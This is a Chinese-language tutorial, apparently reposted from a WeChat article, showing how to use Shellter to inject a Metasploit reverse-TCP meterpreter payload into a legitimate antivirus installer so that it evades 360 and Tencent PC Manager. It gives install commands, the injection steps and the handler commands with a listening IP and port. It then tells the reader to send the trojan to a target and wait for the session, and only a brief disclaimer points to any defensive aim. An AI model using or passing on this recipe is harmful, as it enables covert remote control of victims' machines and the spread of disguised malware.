360木马查杀为什么这么慢 利用Shellter注入工具免杀过360

请遵守法律法规，文章旨在提高安全软件的应变策略，严禁非法使用。

Shellter 是一个 shellcode 注入工具。它有效地重新编码有效负载（此处为外壳代码）以绕过防病毒（AV）软件。Shellter已被证明是Windows 32位应用程序的PE（可移植可执行文件）文件格式的第一个动态感染者。要使用Shellter，您可以创建自己的shellcode，也可以从Metasploit等框架中创建一个shellcode。Shellter 嵌入了一个 32 位 Windows 应用程序和 shellcode。

apt-get update

apt-get install shellter

然后还需要安装wine32

dpkg --add-architecture i386 && apt-get update && apt-get install wine32:i386

中间有不少报错大家跟着提示装东西就行，如果出现这个报错Wine：无法加载kernel32.dll，状态c0000135，跟着安装就行

下载完后就准备一个安装包放在kali，这里我准备的是火绒的安装包（真就拿杀软免杀呗）

打开shellter

选择操作方式：自动/手动，我们选择自动：A ，回车下一步输入你准备的exe路径

等待生成结束后，它会询问我们是否启用隐身模式，可以根据情况，但是启用隐身模式后免杀能力会变弱，所以不建议启用，然后下一步选择 L 列出负载。

这里我选择的第一个

这里输入ip跟端口

再次按下回车后shellter就会帮我们注入shellcode并退出程序，然后我们在msf配置反弹会话的 handler

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.22.1.189 set port 6666 run

最后把马子发给目标，运行后等待上线，下面是过电脑管家跟360的截图。

from https://mp.weixin.qq.com/s?__biz=Mzk0ODMwNjQzMA==&mid=2247485149&idx=1&sn=7dce94d22f514b9893674df1c3944438